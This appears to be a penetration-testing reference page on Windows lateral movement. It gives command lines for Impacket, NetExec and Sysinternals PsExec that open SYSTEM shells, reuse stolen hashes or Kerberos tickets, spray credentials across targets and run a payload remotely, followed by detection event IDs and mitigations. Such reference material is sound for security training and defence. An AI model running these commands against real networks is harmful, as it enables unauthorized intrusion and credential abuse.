PsExec and WMI

Overview

PsExec and WMI are the two most common lateral movement techniques in Windows environments. PsExec uploads a service binary via SMB, creates and starts a Windows service to execute commands, then cleans up. WMI (Windows Management Instrumentation) executes commands through the WMI service (DCOM port 135 + dynamic ports) without writing files to disk. Both require admin credentials on the target — password, NTLM hash (pass-the-hash), or Kerberos ticket.

ATT&CK Mapping

  • Tactic: TA0002 - Execution
  • Technique: T1047 - Windows Management Instrumentation
  • Tactic: TA0008 - Lateral Movement
  • Technique: T1021.002 - Remote Services: SMB/Windows Admin Shares

Prerequisites

  • Valid credentials with local admin rights on the target
  • Network access to SMB (TCP 445) for PsExec or RPC (TCP 135 + dynamic ports) for WMI
  • For pass-the-hash: NTLM hash instead of plaintext password

Techniques

Impacket PsExec

Creates a service on the target, executes commands as SYSTEM, returns output. Writes a binary to the ADMIN$ share.

# Impacket psexec
# https://github.com/fortra/impacket

# Interactive shell as SYSTEM
impacket-psexec '<domain>/<user>:<password>@<target>'

# Execute a specific command
impacket-psexec '<domain>/<user>:<password>@<target>' 'whoami'

# Pass-the-hash
impacket-psexec '<domain>/<user>@<target>' -hashes ':<NThash>'

# With Kerberos
export KRB5CCNAME=<user>.ccache
impacket-psexec -k -no-pass '<domain>/<user>@<target>'

Impacket SMBExec

Similar to PsExec but does not drop a binary. Creates a service that writes output to a file on a share:

# Impacket smbexec
# https://github.com/fortra/impacket
impacket-smbexec '<domain>/<user>:<password>@<target>'
impacket-smbexec '<domain>/<user>@<target>' -hashes ':<NThash>'

Impacket WMIExec

Executes commands via WMI. Does not create a service or write binaries — stealthier than PsExec:

# Impacket wmiexec
# https://github.com/fortra/impacket

# Interactive shell (runs as the authenticated user, not SYSTEM)
impacket-wmiexec '<domain>/<user>:<password>@<target>'

# Execute a command
impacket-wmiexec '<domain>/<user>:<password>@<target>' 'whoami'

# Pass-the-hash
impacket-wmiexec '<domain>/<user>@<target>' -hashes ':<NThash>'

# With Kerberos
impacket-wmiexec -k -no-pass '<domain>/<user>@<target>'

Impacket ATExec

Executes commands via the Windows Task Scheduler (AT service):

# Impacket atexec
# https://github.com/fortra/impacket
impacket-atexec '<domain>/<user>:<password>@<target>' 'whoami'
impacket-atexec '<domain>/<user>@<target>' -hashes ':<NThash>' 'whoami'

NetExec Execution

# NetExec
# https://github.com/Pennyw0rth/NetExec

# Execute command via SMB (uses wmiexec by default)
nxc smb <target> -u <user> -p <password> -x 'whoami'

# Execute PowerShell command
nxc smb <target> -u <user> -p <password> -X 'Get-Process'

# Pass-the-hash
nxc smb <target> -u <user> -H '<NThash>' -x 'whoami'

# Spray and execute across multiple targets
nxc smb targets.txt -u <user> -p <password> -x 'whoami'

Sysinternals PsExec (from Windows)

:: PsExec (Sysinternals)
:: https://learn.microsoft.com/en-us/sysinternals/downloads/psexec

:: Interactive shell as SYSTEM
PsExec.exe \\<target> -u <domain>\<user> -p <password> -s cmd.exe

:: Execute a command
PsExec.exe \\<target> -u <domain>\<user> -p <password> cmd.exe /c whoami

:: Copy and execute a local binary on the remote target
PsExec.exe \\<target> -u <domain>\<user> -p <password> -c payload.exe

Comparison

Feature PsExec SMBExec WMIExec ATExec
Protocol SMB (445) SMB (445) RPC (135) SMB (445)
Runs as SYSTEM SYSTEM Authenticated user SYSTEM
Writes binary Yes No No No
Creates service Yes Yes No Creates scheduled task
Detection level High Medium Low Low

Detection Methods

Network-Based Detection

  • SMB connections to ADMIN$ or C$ shares from non-admin workstations
  • Service creation over SMB (PsExec creates a service with a random name)
  • WMI/DCOM traffic (TCP 135 + dynamic high ports) between workstations

Host-Based Detection

  • Event ID 7045 — new service installed (PsExec service creation)
  • Event ID 4697 — service installed in the system
  • Event ID 4624 (Type 3) — network logon from unexpected source
  • Event ID 4648 — explicit credentials used for logon
  • Sysmon Event ID 1 — process creation with network logon context

Mitigation Strategies

  • Restrict admin shares — disable ADMIN$ and C$ where not needed
  • Limit local admin rights — use LAPS (Local Administrator Password Solution) for unique local admin passwords
  • Network segmentation — restrict SMB (445) and RPC (135) between workstations
  • Disable WMI remotely — if not needed for management
  • Monitor lateral movement indicators — alert on service creation, remote WMI, and scheduled task creation from unexpected sources

References

Official Documentation

MITRE ATT&CK